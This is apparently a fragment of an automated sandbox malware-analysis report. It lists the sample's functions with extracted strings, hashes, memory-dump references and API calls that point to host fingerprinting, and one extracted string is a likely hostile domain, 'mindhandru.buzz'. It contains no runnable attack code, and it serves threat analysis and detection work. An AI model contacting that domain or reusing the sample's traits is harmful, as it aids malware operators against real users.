#E#G, xrefs: 00973D1C
R03!, xrefs: 00972F77
_^]\, xrefs: 00972EA5

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID: #E#G$%"$+A#C$- $f$8]pY$9#'$=]=_$CNF8$Fm$I$JOSP$Q*RG$R03!$V]$].n^$_^]\$_^]\$eN$g}zh$mindhandru.buzz$s$wdnf$~SS}$rp
API String ID: 0-3084901486
Opcode ID: 9c78d2245519b3ee559c94358b542f5c620c1b6af64ffe9078724bf0bf8b025c
Instruction ID: d413a441c5217abefa61a2ba6a338ce45d61aa6bcfd6f16a6fc16391c4fe11a0
Opcode Fuzzy Hash: 9c78d2245519b3ee559c94358b542f5c620c1b6af64ffe9078724bf0bf8b025c
Instruction Fuzzy Hash: 4CB212B2A18301CFD714CF29C8917ABBBA2FF85310F19C56DE4999B391D7389901DB92

Function 009658D5 Relevance: 29.6, APIs: 1, Strings: 15, Instructions: 1631COMMON

Download Yara Rule

Strings

ntxE, xrefs: 00966112
qRb`, xrefs: 00966133
WQ, xrefs: 009659E3
*,-", xrefs: 009666EF
t~v:, xrefs: 009661E7
~mfQ, xrefs: 0096613E
S\], xrefs: 009659EE
L4, xrefs: 00966BA0
w}MI, xrefs: 00966128
{zdy, xrefs: 0096611D
pt}w, xrefs: 009661F2
3F&D, xrefs: 00966273
_^]\, xrefs: 00965B14
uqrs, xrefs: 00966AF0
L4, xrefs: 00966780

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$L4$L4
API String ID: 0-510280711
Opcode ID: 12a20f86deb07ad53da16475e7d9b4854b8a49fe154bd95170d1b3849f66ea07
Instruction ID: 4f89f82033f801422071486f8493be109010f9614a1532adef9d7a4d4eacf296
Opcode Fuzzy Hash: 12a20f86deb07ad53da16475e7d9b4854b8a49fe154bd95170d1b3849f66ea07
Instruction Fuzzy Hash: 5FB215B26083418FD724CF28D8917ABB7E6FFD5304F19892DE8D987296D7359805CB82

Function 00971D00 Relevance: 26.8, Strings: 21, Instructions: 506
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

], xrefs: 00971DAE
], xrefs: 0097214B
_, xrefs: 00972141
_, xrefs: 00971DA4
^, xrefs: 009723B8
^, xrefs: 00971DA9
_, xrefs: 009723B3
\, xrefs: 00971DB3
Z, xrefs: 009720DB
?, xrefs: 00971F02
], xrefs: 009723BD
!@, xrefs: 00971D36
^, xrefs: 00972146
d, xrefs: 009720D6
8, xrefs: 00971F07
\, xrefs: 009723C2
9, xrefs: 00971F0C
\, xrefs: 00972150
g, xrefs: 009720CC
s, xrefs: 00972284
,, xrefs: 009721D9

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID: !@$,$8$9$?$Z$\$\$\$]$]$]$^$^$^$_$_$_$d$g$s
API String ID: 0-1565257739
Opcode ID: 91acbff949d68b94f2a496f6e72d6877630e4722a2e586493e98058a6da1a8a4
Instruction ID: a3f0229936af641169fae5e3388460b007f87e0ba267b560ac6e95ff945bd248
Opcode Fuzzy Hash: 91acbff949d68b94f2a496f6e72d6877630e4722a2e586493e98058a6da1a8a4
Instruction Fuzzy Hash: FD227A7251C7808FD3249B28C48536EBBE1ABC6314F288D6EE5D987392D779C885CB53

Function 00989280 Relevance: 23.4, APIs: 5, Strings: 8, Instructions: 661
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(00001F7A), ref: 00989551
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0098958E
SysFreeString.OLEAUT32 ref: 009898DF
SysFreeString.OLEAUT32(?), ref: 009898E5
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 0098992E

Strings

=hn, xrefs: 00989676
b{tu, xrefs: 009892D9, 0098939B
:;$%, xrefs: 009899C0
gd, xrefs: 0098968E
Jtuj, xrefs: 009892E5
SB, xrefs: 0098979E
t"j, xrefs: 0098966E
O^, xrefs: 009897A6

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID: String$Free$AllocBlanketInformationProxyVolume
String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
API String ID: 1773362589-1335595022
Opcode ID: d9d9f0ce52e6e96d2324a707aec2ad8fb4ade795d9ed9167cbb3d84a774970d6
Instruction ID: fb552fbed70d5aaf92646288d83252d3cf58cb13cbd8d0739e70d04bbb10e876
Opcode Fuzzy Hash: d9d9f0ce52e6e96d2324a707aec2ad8fb4ade795d9ed9167cbb3d84a774970d6
Instruction Fuzzy Hash: F3223376A183019BD310DF28C880B6BBBE6EFC5314F188A2CF9D59B391D675D845CB82

Function 0095B1AF Relevance: 19.1, Strings: 15, Instructions: 388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

hI2K, xrefs: 0095B25D
(Y6[, xrefs: 0095B285
XyR{, xrefs: 0095B2D5
D!M#, xrefs: 0095B1F9
S%U', xrefs: 0095B203
Gq\s, xrefs: 0095B2C1
b6j4, xrefs: 0095B57D
9]_, xrefs: 0095B28F
k=W?, xrefs: 0095B23F
Gu@w, xrefs: 0095B2CB
pE}G, xrefs: 0095B253
.AtC, xrefs: 0095B249
zMzO, xrefs: 0095B267
Ym]o, xrefs: 0095B2B7
yQrS, xrefs: 0095B271

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID: (Y6[$.AtC$9]_$D!M#$Gq\s$Gu@w$S%U'$XyR{$Ym]o$b6j4$hI2K$k=W?$pE}G$yQrS$zMzO
API String ID: 0-620192811
Opcode ID: 36e90a703916da22cc862c08c4258428d7edac1bd260bfbd1931d257fa9ac16d
Instruction ID: 0fdaebe9c95223f2375a541fc21d1833cc452515495ddbb31e9a2bafae73d4ca
Opcode Fuzzy Hash: 36e90a703916da22cc862c08c4258428d7edac1bd260bfbd1931d257fa9ac16d
Instruction Fuzzy Hash: 6BF176B1214B01CFD724CF29E891BABBBE1FB49310F01892DE5AB8B6A1D734A445DF51

Function 00988EA0 Relevance: 15.3, Strings: 12, Instructions: 287
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\, xrefs: 0098919B
_, xrefs: 00988F3C
\, xrefs: 00988F4B
], xrefs: 00989196
^, xrefs: 00989191
^, xrefs: 00988F41
^, xrefs: 00989059
], xrefs: 0098905E
_, xrefs: 0098918C
_, xrefs: 00989054
], xrefs: 00988F46
\, xrefs: 00989063

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
